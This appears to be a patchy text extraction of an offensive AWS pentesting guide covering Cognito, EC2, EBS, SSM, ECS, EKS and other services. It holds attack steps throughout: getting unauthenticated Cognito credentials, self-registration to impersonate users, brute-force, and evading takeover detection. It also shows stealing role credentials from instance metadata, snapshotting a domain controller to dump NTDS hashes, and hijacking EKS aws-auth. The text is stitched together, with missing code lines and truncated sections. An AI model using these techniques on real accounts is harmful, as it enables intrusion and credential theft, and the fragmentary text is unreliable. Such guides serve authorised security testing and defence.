## List App IDs of a user pool
aws cognito-idp list-user-pool-clients --user-pool-id <user-pool-id>
## List configured identity providers for a user pool
aws cognito-idp list-identity-providers --user-pool-id <user-pool-id>
## List user import jobs
aws cognito-idp list-user-import-jobs --user-pool-id <user-pool-id> --max-results 60
## Get MFA config of a user pool
aws cognito-idp get-user-pool-mfa-config --user-pool-id <user-pool-id>
region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId",
"Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}
IdentityId = r.json()["IdentityId"]
headers["X-Amz-Target"] =
"AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)
print(r.json())
Having a set of IAM credentials you should check which access you have
and try to escalate privileges.
Authenticated
There could also be roles available for authenticated users accessing the
Identity Pool.
For this you might need to have access to the identity provider. If that is a
Cognito User Pool, maybe you can abuse the default behaviour and create
a new user yourself.
Anyway, the following example expects that you have already logged in
inside a Cognito User Pool used to access the Identity Pool (don't forget
that other types of identity providers could also be configured).
Source code of applications will usually also contain the user pool ID and
the client application ID, (and some times the application secret?) which
are needed for a user to login to a Cognito User Pool.
Potential attacks
Registration: By default a user can register himself, so he could create
a user for himself.
User enumeration: The registration functionality can be used to find usernames that already exist. This information can be useful for the brute-force attack.
Login brute-force: In the Authentication section you have all the methods a user can use to login; you could try to brute-force them to find valid credentials.
Registration
User Pools allows by default to register new users.
You can provide the needed details with a JSON such as:
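A sketch with the CLI (client ID, attribute names and values are placeholders; the custom attribute is only an example):
aws cognito-idp sign-up --client-id <client-id> --username attacker_user --password <password> \
    --user-attributes '[{"Name": "email", "Value": "attacker@example.com"}, {"Name": "custom:role", "Value": "admin"}]'
# If the app client has a secret, you also need to pass --secret-hash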
You could use this functionality also to enumerate existing users. This is
the error message when a user already exists with that name:
An error occurred (UsernameExistsException) when calling the
SignUp operation: User already exists
Note in the previous command how the custom attributes start with "custom:". Also know that when registering you cannot create new custom attributes for the user. You can only give a value to default attributes (even if they aren't required) and to the custom attributes already specified.
Or just to test if a client id exists. This is the error if the client-id doesn't
exist:
Verifying Registration
Cognito allows verifying a new user by verifying his email or phone number. Therefore, when creating a user you will usually be required to provide at least the username and password and the email and/or telephone number. Just set one you control so you will receive the code to verify your newly created user account like this:
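For example (assuming the code arrived at an email/phone you control):
aws cognito-idp confirm-sign-up --client-id <client-id> --username attacker_user --confirmation-code <code>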
Even if it looks like you can reuse the same email and phone number as an existing user, when you need to verify the created user Cognito will complain about using the same info and won't let you verify the account.
You won't be able to login with the email or phone number until you verify them, but you will be able to login with the username. Note that even if the email was modified and not verified, it will appear in the ID Token inside the email field and the field email_verified will be false; but if the app isn't checking that, you might impersonate other users.
Moreover, note that you can put anything inside the name field just by modifying the name attribute. If an app is checking that field for some reason instead of the email (or any other attribute) you might be able to impersonate other users.
Anyway, if for some reason you changed your email to a new one you can access, you can confirm the email with the code you received at that address:
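For example, with the access token of your session:
aws cognito-idp verify-user-attribute --access-token <access_token> --attribute-name email --code <code>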
Recover/Change Password
It's possible to recover a password just knowing the username (or email or
phone is accepted) and having access to it as a code will be sent there:
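For example:
aws cognito-idp forgot-password --client-id <client-id> --username <username>
# Then, with the code received by email/SMS
aws cognito-idp confirm-forgot-password --client-id <client-id> --username <username> \
    --confirmation-code <code> --password <new_password>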
ADMIN_NO_SRP_AUTH &
ADMIN_USER_PASSWORD_AUTH
This is the server-side authentication flow; in order to login you need to know:
user pool id
client id
username
password
client secret (only if the app is configured to use a secret)
In order to be able to login with this method the application must allow logging in with ALLOW_ADMIN_USER_PASSWORD_AUTH. Moreover, to perform this action you need credentials with the cognito-idp:AdminInitiateAuth permission.
Code to Login
import boto3
import botocore
import hmac
import hashlib
import base64
client_id = "<client-id>"
user_pool_id = "<user-pool-id>"
client_secret = "<client-secret>"
username = "<username>"
password = "<pwd>"
USER_PASSWORD_AUTH
This method is another simple and traditional user & password authentication flow. It's recommended when migrating a traditional authentication method to Cognito, and it's then recommended to disable it and use the ALLOW_USER_SRP_AUTH method instead (as that one never sends the password over the network). This method is NOT enabled by default.
The main difference with the previous auth method inside the code is that
you don't need to know the user pool ID and that you don't need extra
permissions in the Cognito User Pool.
client id
username
password
client secret (only if the app is configured to use a secret)
In order to be able to login with this method that application must allow to
login with ALLOW_USER_PASSWORD_AUTH.
client_id = "<client-id>"
user_pool_id = "<user-pool-id>"
client_secret = "<client-secret>"
username = "<username>"
password = "<pwd>"
USER_SRP_AUTH
This scenario is similar to the previous one, but instead of sending the password through the network to login, a challenge-based authentication is performed (so no password travels, even encrypted, through the net). This method is enabled by default.
user pool id
client id
username
password
client secret (only if the app is configured to use a secret)
Code to login
from warrant.aws_srp import AWSSRP
import os

USERNAME='xxx'
PASSWORD='yyy'
POOL_ID='us-east-1_zzzzz'
CLIENT_ID = '12xxxxxxxxxxxxxxxxxxxxxxx'
CLIENT_SECRET = 'secreeeeet'
os.environ["AWS_DEFAULT_REGION"] = "<region>"

# Complete the SRP flow with the warrant helper (returns id/access/refresh tokens)
aws_srp = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID,
                 client_id=CLIENT_ID, client_secret=CLIENT_SECRET)
tokens = aws_srp.authenticate_user()
print(tokens)
REFRESH_TOKEN_AUTH &
REFRESH_TOKEN
This method is always going to be valid (it cannot be disabled) but you
need to have a valid refresh token.
import boto3

client_id = "<client-id>"
token = '<token>'

boto_client = boto3.client('cognito-idp', region_name='<region>')

def refresh(client_id, refresh_token):
    # Exchange the refresh token for fresh ID and access tokens
    # (if the app client has a secret, a SECRET_HASH auth parameter is also needed)
    return boto_client.initiate_auth(
        ClientId=client_id,
        AuthFlow='REFRESH_TOKEN_AUTH',
        AuthParameters={'REFRESH_TOKEN': refresh_token},
    )

print(refresh(client_id, token))
CUSTOM_AUTH
In this case the authentication is going to be performed through the
execution of a lambda function.
Extra Security
Advanced Security
By default it's disabled, but if enabled, Cognito could be able to detect account takeovers. To minimise the probability of detection you should login from a network inside the same city, using the same user agent (and IP, if that's possible).
TODO: Find how to get AWS credentials of the role/s assigned to the user
of the User Pool (if you know how to do this send a PR please)
Enumeration
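Some example enumeration commands:
aws datapipeline list-pipelines
aws datapipeline describe-pipelines --pipeline-ids <pipeline_id>
aws datapipeline get-pipeline-definition --pipeline-id <pipeline_id>
aws datapipeline list-runs --pipeline-id <pipeline_id>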
Privesc
In the following page you can check how to abuse datapipeline
permissions to escalate privileges:
aws-datapipeline-privesc.md
CodePipeline
AWS CodePipeline is a fully managed continuous delivery service that
helps you automate your release pipelines for fast and reliable application
and infrastructure updates. CodePipeline automates the build, test, and
deploy phases of your release process every time there is a code change,
based on the release model you define.
Enumeration
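Some example enumeration commands:
aws codepipeline list-pipelines
aws codepipeline get-pipeline --name <pipeline_name>
aws codepipeline get-pipeline-state --name <pipeline_name>
aws codepipeline list-pipeline-executions --pipeline-name <pipeline_name>
aws codepipeline list-webhooks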
Privesc
In the following page you can check how to abuse codepipeline
permissions to escalate privileges:
aws-codepipeline-privesc.md
CodeBuild
AWS CodeBuild is a fully managed continuous integration service that
compiles source code, runs tests, and produces software packages that
are ready to deploy. With CodeBuild, you don’t need to provision,
manage, and scale your own build servers.
Enumeration
# Projects
aws codebuild list-shared-projects
aws codebuild list-projects
aws codebuild batch-get-projects --names <project_name> #Check
for creds in env vars
# Builds
aws codebuild list-builds
aws codebuild list-builds-for-project --project-name <p_name>
# Reports
aws codebuild list-reports
aws codebuild describe-test-cases --report-arn <ARN>
Privesc
In the following page you can check how to abuse codebuild permissions
to escalate privileges:
aws-codebuild-privesc.md
CodeCommit
It is a version control service, which is hosted and fully managed by
Amazon, which can be used to privately store data (documents, binary files,
source code) and manage them in the cloud.
It eliminates the requirement for the user to know Git and manage their
own source control system or worry about scaling up or down their
infrastructure. Codecommit supports all the standard functionalities that
can be found in Git, which means it works effortlessly with user’s current
Git-based tools.
Enumeration
# Repos
aws codecommit list-repositories
aws codecommit get-repository --repository-name <name>
aws codecommit get-repository-triggers --repository-name <name>
aws codecommit list-branches --repository-name <name>
aws codecommit list-pull-requests --repository-name <name>
# Approval rules
aws codecommit list-approval-rule-templates
aws codecommit get-approval-rule-template --approval-rule-template-name <name>
aws codecommit list-associated-approval-rule-templates-for-repository --repository-name <name>
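To actually read code from a repo you can, for example, pull individual files via the API or clone with git-remote-codecommit (assuming it is installed and credentials are configured):
aws codecommit get-folder --repository-name <name> --folder-path /
aws codecommit get-file --repository-name <name> --file-path <path/to/file>
# Or clone the whole repo (pip install git-remote-codecommit)
git clone codecommit::<region>://<repository_name>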
Options
Directory Services allows you to create 5 types of directories:
Lab
Here you can find a nice tutorial to create your own Microsoft AD in AWS:
https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html
Enumeration
# Get directories and DCs
aws ds describe-directories
aws ds describe-domain-controllers --directory-id <id>
# Get directory settings
aws ds describe-trusts
aws ds describe-ldaps-settings --directory-id <id>
aws ds describe-shared-directories --owner-directory-id <id>
aws ds get-directory-limits
aws ds list-certificates --directory-id <id>
aws ds describe-certificate --directory-id <id> --certificate-id <id>
Login
Note that if the description of the directory contains a domain in the AccessUrl field, it's probably because a user can login with their AD credentials in some AWS services:
Privilege Escalation
aws-directory-services-privesc.md
Persistence
Using an AD user
An AD user can be given access over the AWS management console via
a Role to assume. The default username is Admin and it's possible to
change its password from AWS console.
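For example, an attacker with the right ds permissions could reset that password (directory ID and password are placeholders):
aws ds reset-user-password --directory-id <directory-id> --user-name Admin --new-password <new_password>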
Enumeration
# Get AD users (Admin not included)
aws workdocs describe-users --organization-id <directory-id>
# Get AD groups (containing "a")
aws workdocs describe-groups --organization-id d-9067a0285c --search-query a
Unlike S3 access logs and CloudFront access logs, the log data generated
by VPC Flow Logs is not stored in S3. Instead, the log data captured is
sent to CloudWatch logs.
Limitations:
If you are running a VPC peered connection, then you'll only be able
to see flow logs of peered VPCs that are within the same account.
If you are still running resources within the EC2-Classic environment,
then unfortunately you are not able to retrieve information from their
interfaces
Once a VPC Flow Log has been created, it cannot be changed. To alter
the VPC Flow Log configuration, you need to delete it and then
recreate a new one.
The following traffic is not monitored or captured by the logs: DHCP traffic within the VPC, and traffic from instances destined for the Amazon DNS server.
Also excluded is any traffic destined to the IP address of the VPC default router, and traffic to and from the following addresses: 169.254.169.254, which is used for gathering instance metadata, and 169.254.169.123, which is used for the Amazon Time Sync Service.
Traffic relating to an Amazon Windows activation license from a
Windows instance
Traffic between a network load balancer interface and an endpoint
network interface
For every network interface that publishes data to the CloudWatch log
group, it will use a different log stream. And within each of these streams,
there will be the flow log event data that shows the content of the log
entries. Each of these logs captures data during a window of
approximately 10 to 15 minutes.
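To enumerate the configured flow logs and read them:
aws ec2 describe-flow-logs
aws logs get-log-events --log-group-name <flow_log_group> --log-stream-name <eni_stream_name>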
Subnets
Subnets help to enforce a greater level of security. Logical grouping of similar resources also helps you to maintain an ease of management across your infrastructure. Valid CIDRs range from a /16 netmask to a /28 netmask. A subnet cannot span different availability zones at the same time.
By having multiple Subnets with similar resources grouped together, it
allows for greater security management. By implementing network level
virtual firewalls, called network access control lists, or NACLs, it's
possible to filter traffic on specific ports from both an ingress and egress
point at the Subnet level.
When you create a subnet, the network and broadcast addresses of the subnet can't be used for host addresses, and AWS reserves the first three host IP addresses of each subnet for internal AWS usage: the first host address is used for the VPC router, the second address is reserved for AWS DNS and the third address is reserved for future use.
Subnets that have direct access to the Internet are called public subnets, whereas private subnets do not have such access.
In order to make a subnet public you need to create and attach an Internet
gateway to your VPC. This Internet gateway is a managed service,
controlled, configured, and maintained by AWS. It scales horizontally
automatically, and is classified as a highly valuable component of your
VPC infrastructure. Once your Internet gateway is attached to your VPC,
you have a gateway to the Internet. However, at this point, your instances
have no idea how to get out to the Internet. As a result, you need to add a
default route to the route table associated with your subnet. The route could
have a destination value of 0.0.0.0/0, and the target value will be set as
your Internet gateway ID.
If you connect a subnet with a different subnet, you cannot access the subnets connected to that other subnet; you need to create a connection with them directly. The same applies to internet gateways: you cannot go through a subnet connection to reach the Internet, you need the internet gateway assigned to your own subnet.
VPC Peering
VPC peering allows you to connect two or more VPCs together, using
IPV4 or IPV6, as if they were a part of the same network.
Relation
Learn how the most common elements of AWS networking (VPCs, networks, subnetworks, interfaces, security groups, NAT gateways...) are related in:
aws-vpcs-network-subnetworks-ifaces-secgroups-nat.md
Enumeration
Check the enumeration of the EC2 section below.
Post-Exploitation
aws-malicious-vpc-mirror.md
EC2
You can use Amazon EC2 to launch as many or as few virtual servers as
you need, configure security and networking, and manage storage.
Amazon EC2 enables you to scale up or down to handle changes in
requirements or spikes in popularity, reducing your need to forecast traffic.
Virtual Machines
SSH Keys
User Data
Snapshots
Networking
Networks
Subnetworks
Public IPs
Open ports
Integrated connections with other networks outside AWS
Instance Profiles
Using roles to grant permissions to applications that run on EC2 instances
requires a bit of extra configuration. An application running on an EC2
instance is abstracted from AWS by the virtualized operating system.
Because of this extra separation, you need an additional step to assign an
AWS role and its associated permissions to an EC2 instance and make them
available to its applications. This extra step is the creation of an instance
profile attached to the instance. The instance profile contains the role and
can provide the role's temporary credentials to an application that runs on
the instance. Those temporary credentials can then be used in the
application's API calls to access resources and to limit access to only those
resources that the role specifies. Note that only one role can be assigned to
an EC2 instance at a time, and all applications on the instance share the
same role and permissions.
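From inside the instance, the role's temporary credentials can be retrieved from the metadata service, e.g. with IMDSv2:
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>"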
Enumeration
# Get EC2 instances
aws ec2 describe-instances
aws ec2 describe-instance-status #Get status from running
instances
# Instance profiles
aws iam list-instance-profiles
aws iam list-instance-profiles-for-role --role-name <name>
# Get tags
aws ec2 describe-tags
# Get volumes
aws ec2 describe-volume-status
aws ec2 describe-volumes
# Get snapshots
aws ec2 describe-snapshots --owner-ids self
# Scheduled instances
aws ec2 describe-scheduled-instances
# Get subnetworks
aws ec2 describe-subnets
# Get FW rules
aws ec2 describe-network-acls
# Get security groups
aws ec2 describe-security-groups
# Get interfaces
aws ec2 describe-network-interfaces
# Get VPCs
aws ec2 describe-vpcs
aws ec2 describe-vpc-peering-connections
Copy Instance
First you need to extract data about the current instances and their AMI/security groups/subnet: aws ec2 describe-images --region eu-west-1
# create a new image for the instance-id
$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1
# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
Privesc
In the following page you can check how to abuse EC2 permissions to
escalate privileges:
aws-ec2-privesc.md
Unauthenticated Access
aws-ec2-unauthenticated-enum.md
DNS Exfiltration
Even if you lock down an EC2 so no traffic can get out, it can still exfil via
DNS.
Network Persistence
If a defender finds that an EC2 instance was compromised he will
probably try to isolate the network of the machine. He could do this with
an explicit Deny NACL (but NACLs affect the entire subnet), or changing
the security group not allowing any kind of inbound or outbound traffic.
If the attacker had an SSH connection to the machine, the change of the security group will kill this connection. However, if the attacker had a reverse shell originating from the machine, even if no inbound or outbound rule allows this connection, the connection won't be killed due to Security Group Connection Tracking.
Mount it in an EC2 VM under your control (it has to be in the same region as the copy of the backup):
Step 1: Head over to EC2 -> Volumes and create a new volume of your preferred size and type.
Step 2: Select the created volume, right click and select the "attach volume" option.
Step 3: Select the instance from the instance text box as shown below.
Step 4: Now, login to your ec2 instance and list the available disks using the following command:
lsblk
The above command will list the disk you attached to your instance.
Step 5: Mount the attached volume, e.g. sudo mount /dev/xvdf1 /mnt (the device name may differ).
Shadow Copy
Any AWS user possessing the EC2:CreateSnapshot permission can steal the hashes of all domain users by creating a snapshot of the Domain Controller, mounting it to an instance they control and exporting the NTDS.dit and SYSTEM registry hive for use with Impacket's secretsdump project.
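A rough outline of those steps with the CLI (volume, snapshot and instance IDs are placeholders):
# Snapshot the DC's volume, turn it into a new volume and attach it to your instance
aws ec2 create-snapshot --volume-id <dc_volume_id> --description "shadow copy"
aws ec2 create-volume --snapshot-id <snapshot_id> --availability-zone <az_of_your_instance>
aws ec2 attach-volume --volume-id <new_volume_id> --instance-id <your_instance_id> --device /dev/sdf
# Then mount it and grab Windows/NTDS/ntds.dit and Windows/System32/config/SYSTEM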
Privesc
In the following page you can check how to abuse EBS permissions to
escalate privileges:
aws-ebs-privesc.md
SSM
Amazon Simple Systems Manager (SSM) allows you to remotely manage fleets of EC2 instances to make their administration much easier. Each of these instances needs to be running the SSM Agent service, as the agent is what receives the actions from the AWS API and performs them.
SSM Agent makes it possible for Systems Manager to update, manage, and
configure these resources. The agent processes requests from the Systems
Manager service in the AWS Cloud, and then runs them as specified in
the request.
Enumeration
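Some example enumeration commands:
# Instances managed by SSM
aws ssm describe-instance-information
# Parameters (may contain secrets)
aws ssm describe-parameters
aws ssm get-parameters-by-path --path / --recursive --with-decryption
# Commands & sessions
aws ssm list-commands
aws ssm list-command-invocations --details
aws ssm describe-sessions --state Active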
Privesc
In the following page you can check how to abuse SSM permissions to
escalate privileges:
aws-ssm-privesc.md
Post-Exploitation
Techniques like SSM message interception can be found in the SSM post-
exploitation page:
aws-ssm-post-exploitation.md
ELB
Elastic Load Balancing (ELB) is a load-balancing service for Amazon
Web Services (AWS) deployments. ELB automatically distributes
incoming application traffic and scales resources to meet traffic demands.
Enumeration
# Launch templates
aws ec2 describe-launch-templates
aws ec2 describe-launch-template-versions --launch-template-id <launch_template_id>
# Autoscaling
aws autoscaling describe-auto-scaling-groups
aws autoscaling describe-auto-scaling-instances
aws autoscaling describe-launch-configurations
aws autoscaling describe-load-balancer-target-groups
aws autoscaling describe-load-balancers
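The block above covers launch templates and autoscaling; a minimal sketch of enumerating the load balancers themselves with standard elbv2/elb calls:
aws elbv2 describe-load-balancers # ALBs/NLBs, note the public DNS names
aws elbv2 describe-listeners --load-balancer-arn <lb-arn>
aws elbv2 describe-target-groups
aws elbv2 describe-target-health --target-group-arn <tg-arn>
aws elb describe-load-balancers # Classic load balancers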
VPN
Site-to-Site VPN
Connect your on-premises network with your VPC.
Concepts
VPN connection: A secure connection between your on-premises
equipment and your VPCs.
VPN tunnel: An encrypted link where data can pass from the
customer network to or from AWS.
Each VPN connection includes two VPN tunnels which you can
simultaneously use for high availability.
Limitations
IPv6 traffic is not supported for VPN connections on a virtual private
gateway.
An AWS VPN connection does not support Path MTU Discovery.
In addition, take the following into consideration when you use Site-to-Site
VPN.
Concepts
Client VPN endpoint: The resource that you create and configure to
enable and manage client VPN sessions. It is the resource where all
client VPN sessions are terminated.
Target network: A target network is the network that you associate
with a Client VPN endpoint. A subnet from a VPC is a target
network. Associating a subnet with a Client VPN endpoint enables
you to establish VPN sessions. You can associate multiple subnets
with a Client VPN endpoint for high availability. All subnets must be
from the same VPC. Each subnet must belong to a different
Availability Zone.
Route: Each Client VPN endpoint has a route table that describes the
available destination network routes. Each route in the route table
specifies the path for traffic to specific resources or networks.
Authorization rules: An authorization rule restricts the users who
can access a network. For a specified network, you configure the
Active Directory or identity provider (IdP) group that is allowed
access. Only users belonging to this group can access the specified
network. By default, there are no authorization rules and you must
configure authorization rules to enable users to access resources and
networks.
Client: The end user connecting to the Client VPN endpoint to
establish a VPN session. End users need to download an OpenVPN
client and use the Client VPN configuration file that you created to
establish a VPN session.
Client CIDR range: An IP address range from which to assign client
IP addresses. Each connection to the Client VPN endpoint is assigned
a unique IP address from the client CIDR range. You choose the client
CIDR range, for example, 10.2.0.0/16 .
Client VPN ports: AWS Client VPN supports ports 443 and 1194 for
both TCP and UDP. The default is port 443.
Client VPN network interfaces: When you associate a subnet with
your Client VPN endpoint, we create Client VPN network interfaces in
that subnet. Traffic that's sent to the VPC from the Client VPN
endpoint is sent through a Client VPN network interface. Source
network address translation (SNAT) is then applied, where the source
IP address from the client CIDR range is translated to the Client VPN
network interface IP address.
Connection logging: You can enable connection logging for your
Client VPN endpoint to log connection events. You can use this
information to run forensics, analyze how your Client VPN endpoint is
being used, or debug connection issues.
Self-service portal: You can enable a self-service portal for your
Client VPN endpoint. Clients can log into the web-based portal using
their credentials and download the latest version of the Client VPN
endpoint configuration file, or the latest version of the AWS provided
client.
Limitations
Client CIDR ranges cannot overlap with the local CIDR of the
VPC in which the associated subnet is located, or any routes manually
added to the Client VPN endpoint's route table.
Client CIDR ranges must have a block size of at least /22 and must
not be greater than /12.
A portion of the addresses in the client CIDR range are used to
support the availability model of the Client VPN endpoint, and
cannot be assigned to clients. Therefore, we recommend that you
assign a CIDR block that contains twice the number of IP
addresses that are required to enable the maximum number of
concurrent connections that you plan to support on the Client VPN
endpoint.
The client CIDR range cannot be changed after you create the Client
VPN endpoint.
The subnets associated with a Client VPN endpoint must be in the
same VPC.
You cannot associate multiple subnets from the same Availability
Zone with a Client VPN endpoint.
A Client VPN endpoint does not support subnet associations in a
dedicated tenancy VPC.
Client VPN supports IPv4 traffic only.
Client VPN is not Federal Information Processing Standards (FIPS)
compliant.
If multi-factor authentication (MFA) is disabled for your Active
Directory, a user password cannot be in the following format.
SCRV1:<base64_encoded_string>:<base64_encoded_string>
Enumeration
Check EC2 enumeration.
A VPC contains a network CIDR like 10.0.0.0/16 (with its routing table
and network ACL).
Therefore, a security group will limit the exposed ports of the network interfaces using it, independently of the subnetwork. And a network ACL will limit the exposed ports for the whole network.
The attacker could also send any response he likes to the messages.
Shortly after the SSM Agent starts up, it will create a WebSocket
connection back to AWS. This connection is the control channel, and is
responsible for listening for connections. When a user tries to start an SSM
session (ssm:StartSession), the control channel will receive the request
and will spawn a data channel. The data channel is responsible for the
actual communication from the user to the EC2 instance.
The communication that takes place between the clients is a binary protocol
specifically for this purpose. Thankfully, the source code for the SSM
Agent is available here, and we can just look up the specification for it. It
looks something like this.
In the next few sections, we’ll cover how malmirror works, what it does,
and how to analyze the exfiltrated data. The script itself can be found on our
GitHub here.
How malmirror Works
malmirror deploys the following resources into an account:
ECS operates using the following three building blocks: Clusters, Services,
and Task Definitions.
Enumeration
# Clusters info
aws ecs list-clusters
aws ecs describe-clusters --clusters <cluster>
# Container instances
## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster.
aws ecs list-container-instances
aws ecs describe-container-instances
# Services info
aws ecs list-services --cluster <cluster>
aws ecs describe-services --cluster <cluster> --services <services>
aws ecs describe-task-sets --cluster <cluster> --service <service>
# Task definitions
aws ecs list-task-definition-families
aws ecs list-task-definitions
aws ecs list-tasks --cluster <cluster>
aws ecs describe-tasks --cluster <cluster> --tasks <tasks>
## Look for env vars and secrets used from the task definition
aws ecs describe-task-definition --task-definition <TASK_NAME>:<VERSION>
Privesc
In the following page you can check how to abuse ECS permissions to
escalate privileges:
aws-ecs-privesc.md
ECR
Amazon Elastic Container Registry (Amazon ECR) is a managed
container image registry service. Customers can use the familiar Docker
CLI, or their preferred client, to push, pull, and manage images.
Public repositories:
Enumeration
aws ecr describe-repositories
aws ecr describe-registry
aws ecr list-images --repository-name <repo_name>
aws ecr describe-images --repository-name <repo_name>
aws ecr describe-image-replication-status --repository-name <repo_name> --image-id <image_id>
aws ecr describe-image-scan-findings --repository-name <repo_name> --image-id <image_id>
aws ecr describe-pull-through-cache-rules --repository-name <repo_name> --image-id <image_id>
# Download
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
After downloading the images you should check them for sensitive info:
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
Privesc
In the following page you can check how to abuse ECR permissions to
escalate privileges:
aws-ecr-privesc.md
EKS
Amazon Elastic Kubernetes Service (Amazon EKS) is a managed service
that you can use to run Kubernetes on AWS without needing to install,
operate, and maintain your own Kubernetes control plane or nodes.
Enumeration
# Generate kubeconfig
aws eks update-kubeconfig --name aws-eks-dev
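Besides generating the kubeconfig, a minimal sketch of basic EKS enumeration with standard CLI calls:
aws eks list-clusters
aws eks describe-cluster --name <cluster> # Check endpoint and whether public access is enabled
aws eks list-nodegroups --cluster-name <cluster>
aws eks describe-nodegroup --cluster-name <cluster> --nodegroup-name <nodegroup>
aws eks list-fargate-profiles --cluster-name <cluster>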
From AWS to Kubernetes
The creator of the EKS cluster is ALWAYS going to be able to get into the Kubernetes cluster as part of the group system:masters (k8s admin). At the time of this writing there is no direct way to find who created the cluster (you can check CloudTrail). And there is no way to remove that privilege.
The way to grant access over K8s to more AWS IAM users or roles is using the configmap aws-auth.
Therefore, anyone with write access over the config map aws-auth will
be able to compromise the whole cluster.
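A minimal sketch of inspecting and abusing that config map, assuming you already have kubectl access to the cluster:
kubectl get configmap aws-auth -n kube-system -o yaml # See which IAM ARNs are mapped to which K8s groups
kubectl edit configmap aws-auth -n kube-system # With write access, map your own IAM ARN to system:masters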
For more information about how to grant extra privileges to IAM roles &
users in the same or different account and how to abuse this to privesc
check this page.
Check also this awesome post to learn how the authentication IAM -> Kubernetes works.
aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum
Security
When creating an App in Beanstalk there are 3 very important security
options to choose:
EC2 key pair: This will be the SSH key that will be able to access the
EC2 instances running the app
IAM instance profile: This is the instance profile that the instances
will have (IAM privileges)
The autogenerated role will have some interesting access over all ECS, all SQS, the DynamoDB elasticbeanstalk tables and the elasticbeanstalk S3 buckets
Service role: This is the role that the AWS service will use to
perform all the needed actions. Afaik, a regular AWS user cannot
access that role.
Exposure
Beanstalk data is stored in an S3 bucket with the following name: elasticbeanstalk-<region>-<acc-id> (if it was created in the AWS console). Inside this bucket you will find the uploaded source code of the application.
Enumeration
# Find S3 bucket
for r in us-east-1 us-east-2 us-west-1 us-west-2 ap-south-1 ap-south-2 ap-northeast-1 ap-northeast-2 ap-northeast-3 ap-southeast-1 ap-southeast-2 ap-southeast-3 ca-central-1 eu-central-1 eu-central-2 eu-west-1 eu-west-2 eu-west-3 eu-north-1 sa-east-1 af-south-1 ap-east-1 eu-south-1 eu-south-2 me-south-1 me-central-1; do aws s3 ls elasticbeanstalk-$r-<account_number> 2>/dev/null; done
# Get events
aws elasticbeanstalk describe-events
Privesc
aws-elastic-beanstalk-privesc.md
From EMR version 4.8.0 and onwards, we have the ability to create a
security configuration specifying different settings on how to manage
encryption for your data within your clusters. You can either encrypt
your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EMR clusters.
One key point of EMR is that by default, the instances within a cluster do not encrypt data at rest. Once enabled, the following features are available.
Once the TLS certificate provider has been configured in the security configuration file, the following application-specific encryption features can be enabled, which will vary depending on your EMR version:
Hadoop MapReduce encrypted shuffle uses TLS. Both secure Hadoop RPC, which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer, which uses AES-256, are activated when at-rest encryption is enabled in the security configuration.
Presto: When using EMR version 5.6.0 and later, any internal
communication between Presto nodes will use SSL and TLS.
Tez Shuffle Handler uses TLS.
Spark: The Akka protocol uses TLS. Block Transfer Service uses
Simple Authentication Security Layer and 3DES. External shuffle
service uses the Simple Authentication Security Layer.
Enumeration
aws emr list-clusters
aws emr describe-cluster --cluster-id <id>
aws emr list-instances --cluster-id <id>
aws emr list-instance-fleets --cluster-id <id>
aws emr list-steps --cluster-id <id>
aws emr list-notebook-executions
aws emr list-security-configurations
aws emr list-studios #Get studio URLs
Privesc
aws-emr-privesc.md
Network Access
These file systems will be accessible from specific networks, so you will need some access inside the network to reach the NFS service.\
Moreover, the EFS mount target in the subnetwork you can access must have a security group allowing access to NFS (port 2049). Without this, you won't be able to contact the NFS service (this isn't created by default).\
For more information about how to do this check: https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount
IAM Access
By default anyone with network access to the EFS will be able to mount, read and write it, even as the root user. However, File System policies could be in place allowing only principals with specific permissions to access it.\ For example, this File System policy won't even allow mounting the file system if you don't have the IAM permission:
{
    "Version": "2012-10-17",
    "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797",
    "Statement": [
        {
            "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "",
            "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018",
            "Condition": {
                "Bool": {
                    "elasticfilesystem:AccessedViaMountTarget": "true"
                }
            }
        }
    ]
}
Note that to mount file systems protected by IAM you MUST use the type
"efs" in the mount command:
sudo mkdir /efs
sudo mount -t efs -o tls,iam <file-system-id/EFS DNS name>:/ /efs/
# To use a different profile from ~/.aws/credentials
# You can use: -o tls,iam,awsprofile=namedprofile
Access Points
Access points are application-specific entry points into an EFS file
system that make it easier to manage application access to shared datasets.\
They can enforce user identity, including the user’s POSIX groups,
different root directory and different IAM policies.
You can mount the File System from an access point with something
like:
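A minimal sketch, assuming the amazon-efs-utils mount helper is installed (the IDs are placeholders):
sudo mount -t efs -o tls,iam,accesspoint=<access-point-id> <file-system-id>: /efs/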
Note that even when trying to mount an access point you still need to be able to contact the NFS service via the network, and if the EFS has a file system policy, you need enough IAM permissions to mount it.
Enumeration
# Get filesystems and access policies (if any)
